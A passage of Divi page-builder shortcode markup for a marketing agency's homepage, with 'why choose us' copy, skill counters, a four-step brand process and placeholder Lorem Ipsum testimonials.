hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" 